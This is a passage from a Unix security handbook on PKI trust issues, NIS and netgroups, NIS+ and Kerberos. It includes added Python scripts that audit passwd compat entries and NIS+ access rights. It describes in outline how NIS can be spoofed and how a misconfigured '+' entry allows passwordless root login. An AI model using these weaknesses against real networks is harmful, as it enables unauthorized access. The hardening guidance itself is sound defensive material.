How do you compare one CA with another CA? Some CAs obtain third-party audits, including SAS 70 [215] (service auditor report) or WebTrust for CAs [216] (attestation report); others do not. The American Bar Association Information Security Committee has published a book, PKI Assessment Guidelines, but few users have the skill or the access to be able to assess the CAs that they might employ.

In theory, many of these questions can be resolved through the creation of standards, audits, and formal systems of accreditation. Legislation can also be used to create standards. But in practice, efforts to date are not encouraging.

There Are Too Many Robert Smiths

What do you do with a certificate that says "Robert Smith" on it? How do you tell which Robert Smith it belongs to? Clearly, a certificate must contain more information than simply a person's name: it must contain enough information to uniquely and legally identify an individual. Unfortunately, you (somebody trying to use Robert Smith's certificate) might not know this additional information, so there are still too many Robert Smiths for you.
Of course, if these digital certificates did have fields for a person's age, gender, or photograph, users on the Internet would say that these IDs violated their privacy if they disclosed that information without the user's consent. And they would be right. That's the whole point of an identification card: to remove privacy and anonymity, producing identity and accountability as a result.

Digital Certificates Allow for Easy Data Aggregation

Over the past two decades, universal identifiers such as the U.S. Social Security number have become tools for systematically violating people's privacy. Universal identifiers can be used to aggregate information from many different sources to create comprehensive data profiles of individuals.

Digital certificates issued from a central location have the potential to become a far better tool for aggregating information than the Social Security number ever was. That's because digital signatures overcome the biggest problem with Social Security numbers: poor data. People sometimes lie about their Social Security numbers; other times, these numbers are mistyped. Today, when two businesses attempt to match individually identified records, the process is often difficult because the numbers don't match. By design, digital certificates will simplify this process by providing for verified electronic entry of the numbers. As a result, the practice of building large data banks of personal information aggregated from multiple sources is likely to increase.

How Do You Loan a Key?

Suppose Carl is sick in the hospital and he wants you to go into his office and bring back his mail. To do this, he needs to give you his private key. Should he be able to do that? Should he revoke his key after you bring it back?

Suppose he's having a problem with a piece of software. It crashes when he uses private key A, but not when he uses private key B.
Should he be legally allowed to give a copy of private key A to the software developer so she can figure out what's wrong with the program? Or is he jeopardizing the integrity of the entire public key infrastructure by doing this?

Suppose a private key isn't associated with a person, but is instead associated with a role that person plays within a company. For example, consider a private key that's used for signing purchase orders. Is it okay for two people to have that private key? Or should the company create two private keys, one for each person who needs to sign purchase orders?

[215] Statement on Auditing Standards (SAS) No. 70, Service Organizations, is an internationally recognized auditing standard developed by the American Institute of Certified Public Accountants (AICPA). A SAS 70 examination signifies that a service organization has had its control objectives and control activities examined by an independent accounting and auditing firm.

[216] Under the WebTrust Program for CAs, an independent and qualified auditor uses an established, recognized, and accepted set of principles and criteria to assess whether an active certification authority meets a minimum standard for disclosures, policies, practices, and monitoring procedures.

Network-based Authentication

Several solutions to the problem of user authentication have been proposed for environments in which there are multiple workstations available to users, connected to one another through an untrusted and potentially unsecure network. For convenience, we'd like to have user account data stored on a central server, but for redundancy we might like to have that central server's data replicated on other servers in real time. For security, we need to ensure that when a user logs into a workstation, his identity is authenticated against the central server's data store without exposing private data on the untrusted network.
Although solutions to this problem have been offered, including NIS, NIS+, Kerberos, and LDAP, none has been universally adopted. NIS and NIS+ are primarily used in environments with many Unix workstations; Kerberos and LDAP are increasingly seen in these environments as well, and are also part of Microsoft Windows NT-based operating systems.

Sun's Network Information Service (NIS)

One of the oldest and best-known distributed administrative database systems is Sun's Network Information Service (NIS). It was superseded years ago by NIS+, an enhanced but more complex successor to NIS, also by Sun. More recently, LDAP (Lightweight Directory Access Protocol) servers are becoming more popular, and Sun users are migrating to LDAP-based services. However, even though NIS has been deprecated by Sun, it is still widely used in many environments.

NIS is a distributed database system that lets many computers share password files, group files, host tables, and other files over the network. Although the files appear to be available on every computer, they are actually stored on only a single computer, called the NIS master server (and possibly replicated on a backup, or slave server). The other computers on the network, NIS clients, can use the databases (such as the password file) stored on the master server as if they were stored locally. These databases are called NIS maps. With NIS, a large network can be managed more easily because all of the account and configuration information can be stored and maintained on a single machine, yet used on all the systems in the network.

Some files are replaced by their NIS maps. Other files are augmented. For these files, NIS uses the plus sign (+) to tell the system that it should stop reading the file (e.g., /etc/passwd) and should start querying the appropriate map (e.g., passwd) from the NIS server.
The server maintains multiple maps, normally corresponding to files stored in the /etc directory, such as /etc/passwd, /etc/hosts, and /etc/services. For example, the /etc/passwd file on a client might look like this:

    root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
    +::999:999:::

This causes the program reading /etc/passwd on the client to make a network request to read the passwd map on the server. Normally, the passwd map is built from the server's /etc/passwd file, although this need not necessarily be the case.

When NIS is scanning the /etc/passwd file, it will stop when it finds the first line that matches. You can restrict the importing of accounts to particular users by following the "+" symbol with a particular username. You can also exclude certain usernames from being imported by inserting a line that begins with a minus sign (-).

NIS also allows you to selectively import some fields from the /etc/passwd database but not others. For example, if you have the following entry in your /etc/passwd file:

    root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
    +:*:999:999:::

then all of the entries in the NIS passwd map will be imported, but each will have its password entry changed to *, effectively preventing it from being used on the client machine. You get all the UIDs and account names, so that file listings show the owner of files and directories as usernames. The entry also allows the ~user notation in the various shells to correctly map to the user's home directory (assuming that it is mounted using NFS).

NIS Domains

When you configure an NIS server, you must specify an NIS domain. These domains are not the same as DNS domains. While DNS domains specify a region of the Internet, NIS domains specify an administrative group of machines. The Unix domainname command is used to display and to change your domainname. A computer can only be in one NIS domain at a time, but it can serve any number of NIS domains.
Don't use your Internet domain as your netgroup domain. Setting the two domains to the same name has caused problems with some versions of sendmail. It is also a security problem to use an NIS domain that can be easily guessed. Hacker toolkits that attempt to exploit NIS or NFS bugs almost always try variations of the Internet domain name as the NIS domainname before trying anything else. (Of course, the domainname can still be determined in other ways.)

NIS Netgroups

NIS netgroups allow you to create groups for users or machines on your network. Netgroups are similar in principle to local groups for users, but they are much more complicated. The primary purpose of netgroups is to simplify your configuration files, and to give you less opportunity to make a mistake. By properly specifying and using netgroups, you can increase the security of your system by limiting the individuals and the machines that have access to critical resources.

The netgroup database is kept on the NIS master server in the file /etc/netgroup or /usr/etc/netgroup. This file consists of one or more lines that have the form:

    groupname member1 member2 ...

Each member can specify a host, a user, and a NIS domain. The members have the form:

    (hostname, username, domainname)

If a username is not included, then every user at the host hostname is a member of the group. If a domainname is not provided, then the current domain is assumed. [217]

[217] It is best to create netgroups in which every member has a username (a netgroup of users) or in which every member has a hostname but does not have a username (a netgroup of hosts). Creating netgroups in which some members are users and some members are hosts makes mistakes somewhat more likely.
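The two file formats just described, the compat entries in a client's /etc/passwd and the netgroup file, are simple enough to parse and check by hand. The Python below is an added example, not code from the handbook or from Sun's NIS: it parses a netgroup file (including nested groups and backslash continuation lines), simulates the client's first-match walk through /etc/passwd for each user in the NIS passwd map, and audits the passwd file for forms an administrator would want to catch (a compat entry left on an NIS server, UID or GID 0 used as the placeholder, and a bare + whose empty password field can be mistaken for a real, passwordless account when NIS is unreachable). It also handles the +@netgroup and -@netgroup forms, which are part of the same compat syntax. The sample netgroup file, NIS map and password hashes other than the handbook's root line are constructed; the function names and audit rules are this example's own.

```python
"""NIS compat entries in /etc/passwd plus netgroups: parse both, simulate the
client's lookup, and audit risky forms.  Added example with constructed data;
the function names and audit rules are this example's own, not part of NIS."""
import re

TRIPLE = re.compile(r"\(([^,]*),([^,]*),([^)]*)\)")   # (host,user,domain)


def parse_netgroups(text):
    """{group: [members]}: (host, user, domain) tuples or names of other groups."""
    groups = {}
    for line in text.replace("\\\n", " ").splitlines():   # join continuation lines
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rest = (line.split(None, 1) + [""])[:2]
        members = []
        for tok in re.findall(r"\([^)]*\)|\S+", rest):
            m = TRIPLE.fullmatch(tok)
            members.append(tuple(x.strip() for x in m.groups()) if m else tok)
        groups[name] = members
    return groups


def expand_netgroup(groups, name, seen=()):
    """Flatten nested netgroups into the set of (host, user, domain) tuples."""
    seen = set(seen) | {name}            # guards against a group that includes itself
    out = set()
    for m in groups.get(name, []):
        if isinstance(m, tuple):
            out.add(m)
        elif m not in seen:
            out |= expand_netgroup(groups, m, seen)
    return out


def parse_passwd_entry(line):
    """Split a passwd line; a name starting with '+' or '-' is a compat directive."""
    f = line.split(":")
    if len(f) != 7:
        raise ValueError("expected 7 fields: %r" % line)
    e = dict(zip(("name", "passwd", "uid", "gid", "gecos", "home", "shell"), f))
    e["kind"] = {"+": "include", "-": "exclude"}.get(e["name"][:1], "local")
    if e["kind"] != "local":
        t = e["name"][1:]
        e["scope"] = "all" if not t else ("netgroup" if t[0] == "@" else "user")
        e["target"] = t.lstrip("@")
    return e


def resolve_users(passwd_text, nis_map, groups):
    """Client lookup for each user in the map: the first matching line wins, and a
    non-empty password field on a '+' line overrides the map's.  {user: (source, pw)}"""
    entries = [parse_passwd_entry(l) for l in passwd_text.splitlines() if l.strip()]
    result = {}
    for user, map_line in nis_map.items():
        for e in entries:
            if e["kind"] == "local":
                if e["name"] == user:
                    result[user] = ("local", e["passwd"])
                    break
                continue
            hit = (e["scope"] == "all" or (e["scope"] == "user" and e["target"] == user)
                   or (e["scope"] == "netgroup"
                       and user in {u for _, u, _ in expand_netgroup(groups, e["target"])}))
            if hit:
                result[user] = (("excluded", None) if e["kind"] == "exclude"
                                else ("nis", e["passwd"] or map_line.split(":")[1]))
                break
    return result


def audit_passwd(passwd_text, is_nis_server=False):
    """Flag compat entries on a server, placeholder UID/GID 0, and a bare '+' whose
    empty password field can become a passwordless '+' login when NIS is down."""
    findings = []
    for n, line in enumerate(passwd_text.splitlines(), 1):
        e = parse_passwd_entry(line) if line.strip() else {"kind": "blank"}
        if e["kind"] in ("local", "blank"):
            continue
        if is_nis_server:
            findings.append((n, "compat entry on an NIS server"))
        if e["uid"] == "0" or e["gid"] == "0":
            findings.append((n, "compat entry uses UID/GID 0 as its placeholder"))
        if e["kind"] == "include" and e["scope"] == "all" and e["passwd"] == "":
            findings.append((n, "bare '+' with empty password field"))
    return findings


# Constructed sample files (the root line is the handbook's own example).
NETGROUPS = """operators  (mathserve,alice,) (,bob,)
guests     (,carol,)
admins     operators (chemserve1,dave,)
"""
NIS_PASSWD_MAP = {
    "alice": "alice:AL1CEhash:2001:100:Alice:/home/alice:/bin/sh",
    "bob":   "bob:B0Bhash:2002:100:Bob:/home/bob:/bin/sh",
    "carol": "carol:CAR0Lhash:2003:100:Carol:/home/carol:/bin/sh",
    "erin":  "erin:ER1Nhash:2004:100:Erin:/home/erin:/bin/sh",
}
CLIENT_PASSWD = """root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
-@guests::999:999:::
+@operators::999:999:::
+:*:999:999:::
"""
```

Run against the sample client file, `resolve_users` imports alice and bob with their map passwords (via the operators netgroup), excludes carol (the -@guests line comes first and so wins), and imports erin with her password replaced by `*` because the trailing bare + carries a password override. `audit_passwd` reports nothing for that file, but reports every compat line when told the file belongs to a server, and reports two findings for a lone `+::0:0:::` line.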
Setting up netgroups

The /etc/yp/makedbm program (sometimes found in /usr/etc/yp/makedbm) processes the netgroup file into a number of database files that are stored in:

    /etc/yp/domainname/netgroup.dir
    /etc/yp/domainname/netgroup.pag
    /etc/yp/domainname/netgroup.byuser.dir
    /etc/yp/domainname/netgroup.byuser.pag
    /etc/yp/domainname/netgroup.byhost.dir
    /etc/yp/domainname/netgroup.byhost.pag

Note that /etc/yp may be symbolically linked to /var/yp on some machines.

If you have a small organization, you might simply create two netgroups: one for all of your users, and a second for all of your client machines. These groups will simplify the creation and administration of your system's configuration files. If you have a larger organization, you might create several groups. For example, you might create a group for each department's users. You could then have a master group that consists of all of the subgroups. Of course, you could do the same for your computers as well. Consider the following science department:

    Math       (mathserve,,) (math1,,) (math2,,) (math3,,)
    Chemistry  (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)
    Biology    (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)
    Science    Math Chemistry Biology

Netgroups are important for security because you use them to limit which users or machines on the network can access information stored on your computer. You can use netgroups in NFS files to limit who has access to the partitions, and in data files such as /etc/passwd, to limit which entries are imported into a system.

Using netgroups to limit the importing of accounts

You can use the netgroups facility to control which accounts are imported by the /etc/passwd file. For example, if you want to import accounts only for a specific netgroup, follow the plus sign (+) with an at sign (@) and a netgroup:

    root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
    +@operators::999:999:::

The above will bring in the NIS password map entries for the users listed in the operators netgroup. You can also exclude users or groups using a minus sign (-) if you list the exclusions before you list the netgroups.

The +@netgroup and -@netgroup notation does not work on all versions of NIS, and historically has not worked reliably on others. If you intend to use these features, check your system to verify that they are behaving as expected. Simply reading your documentation is not sufficient.

Limitations of NIS

NIS has been the starting point for many successful penetrations into Unix networks. Because NIS controls user accounts, if you can convince an NIS server to broadcast that you have an account, you can use that fictitious account to break into a client on the network. NIS can also make confidential information, such as encrypted password entries, widely available.

There are design flaws in the code of the NIS implementations of several vendors that allow a user to reconfigure and spoof the NIS system. This spoofing can be done in two ways: by spoofing the underlying remote procedure call (RPC) system, and by spoofing NIS.

Spoofing RPC

Remote procedure calls (RPC) enable one system on a network to call functions on another system. The NIS system depends on the functioning of the RPC portmapper service. This is a daemon that matches supplied service names for RPC with IP port numbers at which those services can be contacted. Servers using RPC will register themselves with portmapper when they start, and will remove themselves from the portmap database when they exit or reconfigure. Early versions of portmapper allowed any program to register itself as an RPC server, allowing attackers to register their own NIS servers and respond to requests with their own password files.
Most current versions of portmapper reject requests to register or delete services if they come from a remote machine, or if they refer to a privileged port and come from a connection initiated from an unprivileged port. Thus only the superuser can make requests that add or delete service mappings to privileged ports, and all requests can only be made locally. However, not every vendor's version of the portmapper daemon performs these checks.

Note that NFS and some NIS services often register on unprivileged ports. In theory, even with the checks outlined above, an attacker could replace one of these services with a specially written program that would respond to system requests in a way that would compromise system security.

Spoofing NIS

NIS clients get information from an NIS server through RPC calls. A local daemon, ypbind, caches contact information for the appropriate NIS server daemon, ypserv. The ypserv daemon may be local or remote.

Under early SunOS versions of the NIS service (and possibly versions by some other vendors), it was possible to instantiate a program that acted like ypserv and responded to ypbind requests. The local ypbind daemon could then be instructed to use that program instead of the real ypserv daemon. As a result, an attacker could supply his or her own version of the password file (for instance) to a login request! (The security implications of this should be obvious.)

Current NIS implementations of ypbind have a -secure or -s command line flag that can be provided when the daemon is started. If the flag is used, the ypbind daemon will not accept any information from a ypserv server that is not running on a privileged port. Thus, a user-supplied attempt to masquerade as the ypserv daemon will be ignored. A user can't spoof ypserv unless that user already has superuser privileges. There is no good reason not to use the -secure flag.

Unfortunately, the -secure flag has a flaw.
If the attacker is able to subvert the root account on any other machine on the local network and start a version of ypserv using his own NIS information, he need only point the target ypbind daemon to that server. The compromised server would be running on a privileged port, so its responses would not be rejected. An attacker could also write a "fake" ypserv that runs on a PC-based system. Privileged ports have no meaning in this context, so any user can run the server on any port and feed information to the target ypbind process.

NIS is confused about "+"

Even when NIS clients contact the correct servers, NIS can present other security difficulties. For example, a combination of installation mistakes and changes in NIS itself has caused some confusion with respect to the NIS plus sign (+) in the /etc/passwd file.

If you use NIS, be very careful that the plus sign is in the /etc/passwd file of your clients, and not your servers. On a NIS server, the plus sign can be interpreted as a username under some versions of the Unix operating system. The simplest way to avoid this problem is to make sure that you do not have the "+" account on your NIS server.

Attempting to figure out what to put on your client machine is another matter. With early versions of NIS, the following line was distributed:

    +::0:0:::          (correct on SunOS and Solaris)

Unfortunately, this line presented a problem. When NIS was not running, the plus sign was sometimes taken as an account name, and anybody could log into the computer by typing + at the login: prompt, without a password! Even worse, the person logged in with superuser privileges. [218]

One way to minimize the danger was by including a password field for the plus user.
Specify the plus sign line in the form:

    +:*:0:0:::          (on NIS clients only)

Unfortunately, under some versions of NIS this entry actually means "import the passwd map, but change all of the encrypted passwords to *", which effectively prevents everybody from logging in. This entry wasn't right either!

The easiest way to deal with this confusion is simply to attempt to log into your NIS clients and servers using a + as a username. You may also wish to try logging in with the network cable unplugged, to simulate what happens to your computer when the NIS server cannot be reached. In either case, you should not be able to log in by simply typing + as a username. This test will tell you if your server is properly configured.

If you are running a recent version of your operating system, do not think that your system is immune to the + confusion in the NIS sub-system. In particular, some NIS versions on Linux got this wrong too.

Improving NIS security

NIS databases contain sensitive information. There are several ways to prevent unauthorized disclosure of your NIS databases. As with most security improvements, you can combine several of these for a layered "defense-in-depth" approach:

1. Protect your site with a firewall, or at least a smart router, and do not allow the UDP packets associated with RPC to cross between your internal network and the outside world. Unfortunately, because RPC is based on the portmapper, the actual UDP port that is used is not fixed. In practice, the only safe strategy is to block all UDP packets except those that you specifically wish to let cross.
2. Use a portmapper program that allows you to specify a list of computers (by hostname or IP address) that should be allowed or denied access to specific RPC servers. If you don't have a firewall, an attacker can still scan for each individual RPC service without consulting the portmapper, but if they do make an attempt at the portmapper first, an improved version may give you warning.
3. Find out if your version of NIS uses the /var/yp/securenets file on NIS servers. This file, when present, can be used to specify a list of networks that may receive NIS information. Other versions may provide other ways for the ypserv daemon to filter addresses that are allowed to access particular RPC servers.
4. Don't tighten up NIS but forget about DNS! If you decide that outsiders should not be able to learn your site's IP addresses, be sure to run two nameservers, one for internal use and one for external use.

[218] On Sun's NIS implementation, and possibly others, this danger can be ameliorated somewhat by avoiding 0 or other local user values as the UID and GID values in NIS entries in the passwd file.

Sun's NIS+

NIS was designed for a small, friendly computing environment. As Sun Microsystems' customers began to build networks with thousands of workstations, NIS proved to be too unwieldy and insecure for enterprise use. Sun Microsystems started working on an NIS replacement in 1990. That system was released a few years later as NIS+.

NIS+ quickly earned a bad reputation. By all accounts, the early releases were virtually untested and rarely operated as promised. Furthermore, the documentation was confusing and incomplete. Eventually, Sun worked the bugs out of NIS+ and today it is a more reliable system for secure network management and control. An excellent reference for people using NIS+ is Rick Ramsey's book, All About Administering NIS+ (SunSoft Press, Prentice Hall, 1994).

What NIS+ Does

NIS+ creates network databases that are used to store information about computers and users within an organization. NIS+ calls these databases tables; they are functionally similar to NIS maps. Unlike NIS, NIS+ allows for incremental updates of the information stored on replicated database servers throughout the network.
Each NIS+ domain has exactly one NIS+ root domain server. This is a computer that contains the master copy of the information stored in the NIS+ root domain. The information stored on this server can be replicated, allowing the network to remain usable even when the root server is down or unavailable. There may also be NIS+ servers for subdomains.

Entities that communicate using NIS+ are called NIS+ principals. An NIS+ principal may be a host or an authorized user. Each NIS+ principal has a public key and a secret key, which are stored on an NIS+ server in the domain. All communication between NIS+ servers and NIS+ principals takes place through Secure RPC, a version of RPC that authenticates and protects procedure calls with DES encryption. This makes the communication resistant to both eavesdropping and spoofing attacks. NIS+ also oversees the creation and management of Secure RPC keys. By virtue of using NIS+, every member of the organization is enabled to use Secure RPC.

NIS+ Tables and Other Objects

All information stored on an NIS+ server is stored in the form of objects. NIS+ supports three fundamental types of objects. Tables store configuration information; groups collectively refer to a set of NIS+ principals and are used for authorization; directories are containers for tables, groups, or other directories, and provide a tree structure to the NIS+ server. NIS+ predefines 16 tables, including tables for hosts and networks, protocols and services, user accounts and passwords, user groups and netgroups, e-mail aliases, and others; users are free to create additional tables of their own.

Using NIS+

Using an NIS+ domain can be remarkably pleasant. When a user logs in to a workstation, the login process automatically acquires the user's NIS+ security credentials and attempts to decrypt them with the user's login password.
If the account password and the NIS+ credentials password are the same (and they usually are), the NIS+ keyserv process will cache the user's secret key and the user will have transparent access to all Secure RPC services. If the account password and the NIS+ credentials password are not the same, then the user will need to manually log in to the NIS+ domain by using the keylogin command. NIS+ users change their passwords with the NIS+ nispasswd command, which works in much the same way as the standard UNIX passwd command.

NIS+ security is implemented by providing a means for authenticating users, and by establishing access control lists that control the ways that those authenticated users can interact with the information stored in NIS+ tables. NIS+ provides for two authentication types. Local authentication is based on the UID executing an NIS+ command and is used largely for administering the root NIS+ server. DES authentication is based on Secure RPC.

Each NIS+ object has an owner, which is usually the object's creator. (An object's owner can be changed with the nischown command.) NIS+ objects also have access control lists, which are used to control which principals have what kind of access to the object: read, modify, create, destroy, or a combination. Four types of principals may have access rights to an object: nobody (unauthenticated requests), the object's owner, principals in the object's group, and other authenticated principals.

NIS+ tables may provide additional access privileges for individual rows, columns or entries that they contain. Thus, all authenticated users may have read access to an entire table, but each user may further have the ability to modify the row of the table associated with the user's own account. Note that while permissions on individual rows, columns, or entries can broaden the access control list, they cannot impose more restrictive rules.
Limitations of NIS+

If properly configured, NIS+ can be a very secure system for network management and authentication. However, like all security systems, it is possible to make a mistake in the configuration or management of NIS+ that would render a network that it protects somewhat less than secure. Here are some things to be aware of:

Do not run NIS+ in NIS compatibility mode

NIS+ has an NIS compatibility mode that allows the NIS+ server to interoperate with NIS clients. NIS requests carry no authentication, so in this mode any host on your network (and possibly on other networks as well) that can reach the server can read whatever the nobody class is allowed to read, and for NIS clients to work at all that normally has to include the passwd table and the other core tables.

Manually inspect the permissions of NIS+ objects on a regular basis

System integrity checking software does not exist (yet) for NIS+. In its absence, you must manually inspect the NIS+ tables, directories, and groups on a regular basis. Be on the lookout for objects that can be modified by Nobody or by World; also be on the lookout for tables in which new objects can be created by these principal classes.

Secure the computers on which your NIS+ servers are running

Your NIS+ server is only as secure as the computer on which it is running. If attackers can obtain root access on your NIS+ server, they can make any change that they wish to your NIS+ domain, including creating new users, changing user passwords, and even changing your NIS+ server's master password.

Use NIS+ security level 2 on servers

NIS+ servers can operate at three security levels, denoted 0, 1, and 2. Level 0 grants every request full access and level 1 also accepts unauthenticated (local) credentials; only at level 2 is full Secure RPC (DES) authentication and access checking enabled, and only level 2 security should be used for NIS+ servers.
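The access-right model described above, and the manual inspection the Handbook asks for, as an added example (not code from the Handbook or from Solaris). It assumes the 16-character rights string that nisls -l and niscat -o print, four groups of r m c d for nobody, owner, group and world in that order; the object names and rights in SAMPLE_OBJECTS are constructed sample data, not a real domain.

```python
"""Audit NIS+ access-right strings, as the Handbook recommends doing by hand.

Added example, not from the Handbook or from Solaris.  It reads the 16-character
rights string that nisls -l / niscat -o print ("----rmcdr---r---"): four groups of
r m c d (read, modify, create, destroy) for, in order, nobody, owner, group and
world.  The object names and rights below are constructed sample data."""

CLASSES = ("nobody", "owner", "group", "world")
RIGHTS = "rmcd"


def parse_rights(s):
    """'----rmcdr---r---' -> {'nobody': set(), 'owner': {'r','m','c','d'}, ...}"""
    if len(s) != 16:
        raise ValueError("rights string must be 16 characters: %r" % s)
    rights = {}
    for i, cls in enumerate(CLASSES):
        chunk = s[4 * i:4 * i + 4]
        granted = set()
        for pos, ch in enumerate(chunk):
            if ch == RIGHTS[pos]:
                granted.add(ch)
            elif ch != "-":
                raise ValueError("bad character %r at position %d in %r" % (ch, 4 * i + pos, s))
        rights[cls] = granted
    return rights


def effective_rights(table_rights, entry_rights):
    """Rights on a row, column or entry can only add to the table's rights, never remove."""
    table, entry = parse_rights(table_rights), parse_rights(entry_rights)
    return {cls: table[cls] | entry[cls] for cls in CLASSES}


def audit(objects):
    """Return (object, class, rights) for every object that nobody or world may
    modify, create in, or destroy: the findings the Handbook says to look for."""
    findings = []
    for name, rights_string in objects:
        rights = parse_rights(rights_string)
        for cls in ("nobody", "world"):
            dangerous = rights[cls] & {"m", "c", "d"}
            if dangerous:
                findings.append((name, cls, "".join(sorted(dangerous))))
    return findings


# Constructed sample listing, not a real domain.
SAMPLE_OBJECTS = [
    ("org_dir.example.com.", "----rmcdr---r---"),          # owner only: fine
    ("passwd.org_dir.example.com.", "----rmcdr---r---"),
    ("hosts.org_dir.example.com.", "r---rmcdrmcdrmc-"),    # world may modify and create
    ("groups_dir.example.com.", "--c-rmcdr---r---"),       # unauthenticated users may create
]

if __name__ == "__main__":
    for obj, cls, rights in audit(SAMPLE_OBJECTS):
        print("%-32s %-7s may %s" % (obj, cls, rights))
```

Feed it the name and rights columns of a real nisls -l listing instead of SAMPLE_OBJECTS and run it from cron; anything it reports for the nobody or world class is exactly what the "manually inspect the permissions" item above warns about. effective_rights shows why a permissive table-level entry cannot be repaired by tightening a single row: the row's rights are unioned with the table's, never subtracted.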
Kerberos

At the Massachusetts Institute of Technology in the late 1980s, hundreds of high-performance workstations with big screens, fast (for the time) processors, small disks, and Ethernet interfaces replaced the older system of a few large timesharing computers with terminals. The goal was to allow any user to sit down at any computer and enjoy full access to his files and to the network. As soon as the workstations were deployed, the problem of network eavesdropping became painfully obvious; with the network accessible from all over campus, nothing prevented students (or outside intruders) from running network spy programs. It was nearly impossible to prevent the students from learning the superuser password of the workstations or simply rebooting them in single-user mode. To further complicate matters, many of the computers on the network were IBM PC/ATs running software that didn't have even rudimentary computer security. Something had to be done to protect student files in the networked environment to the same degree that they were protected in the time-sharing environment.

MIT's ultimate solution to this security problem was Kerberos, an authentication system that uses DES cryptography to protect sensitive information such as passwords on an open network. When the user logs in to a workstation running Kerberos, that user is issued a ticket from the Kerberos server. The user's ticket can only be decrypted with the user's password; it contains information necessary to obtain additional tickets. From that point on, whenever the user wishes to access a network service, an appropriate ticket for that service must be presented. As all of the information in the Kerberos tickets is encrypted before it is sent over the network, the information is not susceptible to eavesdropping or misappropriation.

Kerberos 4 vs. Kerberos 5

Kerberos has gone through five major revisions during its history to date.
Currently there are two versions of Kerberos in use in the marketplace. Kerberos 4 is more efficient than Kerberos 5, but more limited. For example, Kerberos 4 can only work over TCP/IP networks. Kerberos 4 has not been updated in many years, and is currently deprecated. In early 1996, graduate students with the COAST Laboratory [219] at Purdue University discovered a long-standing weakness in the key generation for Kerberos 4 that allows an attacker to guess session keys in a matter of seconds. Although a patch for this vulnerability has been widely distributed, some Kerberos 4 implementations are known to be vulnerable to buffer-overflow attacks and no patches have been posted.

Kerberos 5 fixes minor problems with the Kerberos protocol, making it more resistant to determined attacks over the network. Kerberos 5 is also more flexible: it can work with different kinds of networks. Kerberos 5 also has provisions for working with encryption schemes other than DES. Although algorithms such as Triple-DES have been implemented, their use is not widespread, largely because of legacy applications that expect DES encryption. Finally, Kerberos 5 supports delegation of authentication, ticket expirations longer than 21 hours (the Kerberos 4 maximum), renewable tickets, tickets that will work sometime in the future (postdated tickets), and many more options. If you are going to use Kerberos, you should definitely use version 5. The IETF is working to revise and clarify RFC 1510, which defines Kerberos 5, and major protocol extensions are expected to follow.

[219] Incorporated into the CERIAS research center in 1998.

Kerberos Authentication

Kerberos authentication is based entirely on the knowledge of passwords that are stored on the Kerberos Server.
Unlike Unix passwords, which are stored as the output of a one-way function that cannot be reversed, Kerberos stores for each principal a secret key derived from the password, encrypted on the server with a conventional (reversible) encryption algorithm, in most cases DES, so that the server can decrypt and use the key whenever it needs to. A user proves her identity to the Kerberos Server by demonstrating knowledge of her key. The fact that the Kerberos Server holds every user's secret key (which is equivalent to the password for all Kerberos purposes) is a result of the fact that Kerberos does not use public key cryptography. [220] This is a serious disadvantage of the Kerberos system. It means that the Kerberos Server must be both physically secure and "computationally secure." The server must be physically secure to prevent an attacker from stealing the Kerberos Server and learning all of the users' keys. The server must also be immune to login attacks: if an attacker could log onto the server and become root, that attacker could, once again, steal all of the keys.

Kerberos was designed so that the server can be stateless. The Kerberos Server simply answers requests from users and issues tickets (when appropriate). This design makes it relatively simple to create replicated, secondary servers that can handle authentication requests when the primary server is down or otherwise unavailable. Unfortunately, these secondary servers need complete copies of the entire Kerberos database, which means that they must also be physically and computationally secure.

Initial login

Logging into a workstation that is using Kerberos looks the same to a user as logging into a regular computer. You type your username and password, and if they are correct, you get logged in. Accessing files, electronic mail, printers, and other resources all work as expected. What happens behind the scenes, however, is far more complicated.
When the workstation's login process, sshd [221], other network daemon, or authentication library (such as PAM) knows about Kerberos, it uses the Kerberos system to authenticate the user. First, the Kerberos client needs to know where to find Kerberos servers. This can be configured manually on each client (traditionally in the krb5.conf file), or Kerberos servers can be advertised through DNS SRV records. IETF Internet-Draft draft-ietf-krb-wg-krb-dns-locate describes this approach.

With Kerberos 4, the workstation sends a message to the Kerberos Authentication Server [222] after you type your username. This message contains your username and indicates that you are trying to log in. The Kerberos Server checks its database and, if you are a valid user, sends back a ticket granting ticket that is encrypted with a key derived from your password. The workstation then asks you to type in your password and finally attempts to decrypt the encrypted ticket using the password that you've supplied. If the decryption is successful, the workstation then forgets your password, and uses the ticket granting ticket exclusively. If the decryption fails, the workstation knows that you supplied the wrong password and it gives you a chance to try again.

[220] Public key cryptography was not used because it was still under patent protection at the time that Kerberos was developed. There is a current IETF Internet Draft entitled "Public Key Cryptography for Initial Authentication in Kerberos" that proposes methods for combining public key smartcards with Kerberos. This draft has been implemented in Microsoft's Kerberos.

[221] Patches for OpenSSH to use Kerberos 5 for authentication are available at http://www.sxw.org.uk/computing/patches/openssh.html. Although Kerberos 4 has also been used with SSH, it's much more difficult to make the two systems interoperate.
Fortunately, the SSH protocol version 2 can use the same security layer (GSSAPI) as Kerberos 5, which simplifies things considerably. The IETF Internet-Draft that covers the combination of these systems is draft-ietf-secsh-gsskeyex.

[222] According to the Kerberos papers and documentation, there are two logical Kerberos Servers: the Authentication Server and the Ticket Granting Service. Some commentators think that this is disingenuous, because all Kerberos systems employ a single physical server, the Kerberos Server or Key Server.

With Kerberos 5, the workstation waits until after you have typed your password before contacting the server. It then sends the Kerberos Authentication Server a message consisting of your username and the current time encrypted with a key derived from your password (this is called pre-authentication). The Authentication Server looks up your username, retrieves your key, and attempts to decrypt the encrypted time. If the server can decrypt the current time (and the value is indeed current), it then creates a ticket granting ticket and sends you a reply. [223] The reply has two parts: the ticket granting ticket itself, which is encrypted with the Ticket Granting Service's own key so that only the Ticket Granting Service can read it, and a session key for talking to the Ticket Granting Service, which is encrypted with your key so that only your workstation can read it. The user's workstation can now contact the Kerberos Ticket Granting Service to obtain tickets for any principal within the Kerberos realm, that is, the set of servers and users that are known to the Kerberos Server. For example, when the user first tries to access his files from a Kerberos workstation, system software on the workstation contacts the Ticket Granting Service and asks for a ticket for the File Server Service. The Ticket Granting Service sends the user back a ticket for the File Server Service.
